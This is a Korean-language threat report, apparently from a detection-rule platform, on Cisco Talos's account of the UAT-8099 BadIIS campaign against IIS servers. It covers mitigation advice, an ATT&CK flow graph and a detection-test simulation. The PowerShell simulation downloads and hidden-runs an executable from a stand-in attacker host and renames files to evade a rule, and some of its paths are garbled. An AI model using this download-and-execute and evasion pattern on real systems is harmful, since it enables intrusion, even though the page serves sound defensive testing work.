팔로우
요약
Cisco Talos는 아시아 전역의 취약한 IIS 웹 서버를 대상으로 하는 새로운 UAT-8099 캠페인을 보고했습니다. 행위자는 지역 식별자를 포함하는 맞춤형 BadIIS 변종을 배포하고 웹 셸, PowerShell 및 GotoHTTP 원격 제어 도구에 의존하여 후속 제어를 수행합니다. 지속성이 확장되어 숨겨진 로컬 계정 생성 및 합법적인 레드팀 유틸리티 사용으로 관리 활동에 혼합됩니다. 이 전술은 이전 WEBJACK 작전과 겹치고 있으며 태국과 베트남의 사이트에 영향을 미치는 SEO 사기에 초점을 맞춘 것으로 보입니다.
조사
Talos는 침입 경로를 재구축하기 위해 DNS 원격측정, 파일 해시 및 악성 스크립트를 검토했습니다. 분석가들은 웹 셸과 SoftEther VPN 및 EasyTier와 같은 도구를 결합한 것을 관찰했으며 Sharp4RemoveLog, CnCrypt Protect, OpenArk64, GotoHTTP 등 맞춤형 유틸리티 세트를 발견했습니다. 두 지역 특화된 BadIIS 변종 – IISHijack 및 asdSearchEngine -이 역공학되어 하드코딩된 국가 코드, 선택적 요청 필터링 및 XOR 암호화된 C2 구성을 드러냈습니다. 유사한 C2 도메인이 포함된 BadIIS의 ELF 빌드도 VirusTotal에서 확인되었습니다.
완화 방안
노출된 IIS 취약점을 패치하고 웹 애플리케이션 방화벽 강화를 강화하며 숨겨진 로컬 계정 생성을 모니터링하십시오(예: admin$, mysql$ 및 유사한 계정). GotoHTTP를 다운로드하거나 실행하는 PowerShell 활동을 감지하고 알려진 C2 도메인으로의 아웃바운드 통신을 차단합니다. 식별된 커스텀 유틸리티의 실행 및 웹 서버 디렉토리 내의 예상치 못한 수정 사항에 대한 알림을 제공하는 엔드포인트 제어를 사용합니다.
대응
지표가 발견되면 서버를 격리하고 웹 셸을 제거하며 숨겨진 계정을 삭제합니다. 법의학 분석을 위해 BadIIS 바이너리 및 관련 스크립트를 보존하고 C2 활동을 식별하기 위해 전체 네트워크 트래픽 검토를 수행합니다. 다시 감염을 방지하기 위해 알려진 정상 백업에서 복원하고 IIS 구성을 다시 강화합니다.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 %% Node definitions action_exploit_public_facing[“<b>행동</b> – <b>T1190 공개 노출 애플리케이션 악용</b><br/><b>설명</b>: 인터넷에 노출된 애플리케이션의 취약점을 악용하여 초기 접근 권한을 획득함.<br/><b>세부사항</b>: 알려진 취약점을 통해 IIS 서버를 침해하고 웹 셸을 배포함.”] class action_exploit_public_facing action tool_web_shell[“<b>도구</b> – <b>이름</b>: 웹 셸<br/><b>설명</b>: 원격 명령 실행을 가능하게 하는 서버 측 스크립트.”] class tool_web_shell tool action_powershell_execution[“<b>행동</b> – <b>T1059.001 PowerShell</b><br/><b>설명</b>: PowerShell을 사용하여 명령 및 페이로드를 실행함.<br/><b>명령</b>: whoami, tasklist, 도구 다운로드.”] class action_powershell_execution action tool_powershell[“<b>도구</b> – <b>이름</b>: PowerShell<br/><b>설명</b>: Windows 명령줄 셸 및 스크립팅 언어.”] class tool_powershell tool action_system_info_discovery[“<b>행동</b> – <b>T1082 시스템 정보 수집</b><br/><b>설명</b>: 운영 체제 및 하드웨어 구성을 수집함.<br/><b>명령</b>: 시스템 정보 수집, 사용자 컨텍스트 기록.”] class action_system_info_discovery action action_create_account[“<b>행동</b> – <b>T1136 계정 생성</b><br/><b>설명</b>: 지속성을 위해 숨겨진 로컬 계정을 생성함.”] class action_create_account action action_valid_accounts[“<b>행동</b> – <b>T1078 유효한 계정</b><br/><b>설명</b>: 생성된 계정을 사용하여 지속적인 접근 및 권한 상승을 수행함.”] class action_valid_accounts action action_clear_event_logs[“<b>행동</b> – <b>T1070.001 Windows 이벤트 로그 삭제</b><br/><b>설명</b>: 활동 흔적을 숨기기 위해 로그를 제거함.<br/><b>도구</b>: Sharp4RemoveLog 유틸리티.”] class action_clear_event_logs action tool_sharp4removelog[“<b>도구</b> – <b>이름</b>: Sharp4RemoveLog<br/><b>설명</b>: Windows 이벤트 로그를 삭제하는 유틸리티.”] class tool_sharp4removelog tool action_disable_event_logging[“<b>행동</b> – <b>T1562.002 Windows 이벤트 로깅 비활성화</b><br/><b>설명</b>: 로깅을 비활성화하여 방어 기능을 약화시킴.”] class action_disable_event_logging action action_obfuscate_files[“<b>행동</b> – <b>T1027 파일 또는 정보 난독화</b><br/><b>설명</b>: XOR 암호화(키 0x7A)를 사용하여 C2 구성 및 HTML 템플릿을 은닉함.”] class action_obfuscate_files action malware_badiis[“<b>악성코드</b> – <b>이름</b>: BadIIS<br/><b>설명</b>: XOR 난독화를 사용하는 변종.”] class malware_badiis malware action_lateral_tool_transfer[“<b>행동</b> – <b>T1570 측면 이동 도구 전송</b><br/><b>설명</b>: 피해자 환경으로 도구 및 파일을 전송함.<br/><b>도구</b>: BadIIS 바이너리, GotoHTTP, SoftEther VPN, EasyTier.”] class action_lateral_tool_transfer action tool_gotohttp[“<b>도구</b> – <b>이름</b>: GotoHTTP<br/><b>설명</b>: HTTP/HTTPS를 통해 파일을 전송함.”] class tool_gotohttp tool tool_softether[“<b>도구</b> – <b>이름</b>: SoftEther VPN<br/><b>설명</b>: 트래픽 터널링을 위한 다중 홉 프록시.”] class tool_softether tool tool_easytier[“<b>도구</b> – <b>이름</b>: EasyTier<br/><b>설명</b>: 트래픽 터널링을 위한 다중 홉 프록시.”] class tool_easytier tool action_proxy_multi_hop[“<b>행동</b> – <b>T1090.003 프록시 다중 홉 프록시</b><br/><b>설명</b>: 트래픽의 출처를 은닉하기 위해 프록시 도구를 사용함.”] class action_proxy_multi_hop action action_web_protocol_c2[“<b>행동</b> – <b>T1071.001 웹 프로토콜</b><br/><b>설명</b>: GotoHTTP를 사용하여 HTTP/HTTPS를 통해 C2와 통신함.”] class action_web_protocol_c2 action %% Connections showing flow action_exploit_public_facing –>|사용| tool_web_shell tool_web_shell –>|가능하게 함| action_powershell_execution action_powershell_execution –>|사용| tool_powershell tool_powershell –>|실행| action_system_info_discovery action_system_info_discovery –>|이어짐| action_create_account action_create_account –>|가능하게 함| action_valid_accounts action_valid_accounts –>|사용| action_clear_event_logs action_clear_event_logs –>|사용| tool_sharp4removelog action_clear_event_logs –>|또한| action_disable_event_logging action_disable_event_logging –>|선행| action_obfuscate_files action_obfuscate_files –>|구현됨| malware_badiis malware_badiis –>|촉진함| action_lateral_tool_transfer action_lateral_tool_transfer –>|전송| tool_gotohttp action_lateral_tool_transfer –>|전송| tool_softether action_lateral_tool_transfer –>|전송| tool_easytier tool_softether –>|사용됨| action_proxy_multi_hop tool_easytier –>|사용됨| action_proxy_multi_hop action_proxy_multi_hop –>|지원| action_web_protocol_c2 tool_gotohttp –>|사용됨| action_web_protocol_c2
공격 흐름
시뮬레이션 실행
전제 조건: 텔레메트리 및 기준선 항공 전검사를 완료해야 합니다.
-
공격 서사와 명령:
공격자는 침해된 웹 서버에 초기 발판을 마련했습니다. 그들은 IIS 웹 루트 하에 숨겨진 디렉토리인bad_iis을 생성하고 사용자 지정 이름의 웹 셸 바이너리인shell_xyz.exe(“웹 셸”이라는 문자열 회피)을 설치하고 나중에 GotoHTTP 바이너리를 다운로드하는 PowerShell 페이로드를 측면 실행합니다. 이를svc_update.exe로 이름을 변경하고 실행합니다. 이미지 이름이 난독화되었기 때문에 원래 규칙의Image|contains검사가 우회되지만, 명령줄에는 여전히 ‘PowerShell’이 포함되어 있습니다. -
회귀 테스트 스크립트: 이 스크립트는 설명된 단계를 재현하고 BadIIS 공격과 유사한 텔레매트리를 생성합니다. 정확히 규칙이 주시하는 문자열을 사용하지 않습니다.
# BadIIS simulation – obfuscated version $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null # Deploy a renamed web‑shell (binary copy of a known benign exe) $shellSrc = "$env:SystemRootSystem32notepad.exe" $shellDst = Join-Path $payloadDir "shell_xyz.exe" Copy-Item -Path $shellSrc -Destination $shellDst -Force # Simulate the web‑shell invoking PowerShell to download GotoHTTP $gotoUrl = "http://malicious.example.com/GotoHTTP.exe" $gotoDst = "C:WindowsTempsvc_update.exe" $psCommand = @" Invoke-WebRequest -Uri '$gotoUrl' -OutFile '$gotoDst'; Start-Process -FilePath '$gotoDst' -WindowStyle Hidden; "@ # Execute the PowerShell payload via the renamed web‑shell (process creation) Start-Process -FilePath $shellDst -ArgumentList "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `$psCommand`" -WindowStyle Hidden Write-Output "BadIIS simulation executed." -
정리 명령: 심어진 흔적을 제거하고 환경을 복원합니다.
# Cleanup BadIIS simulation artifacts $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue $gotoDst = "C:WindowsTempsvc_update.exe" Remove-Item -Path $gotoDst -Force -ErrorAction SilentlyContinue Write-Output "Cleanup completed."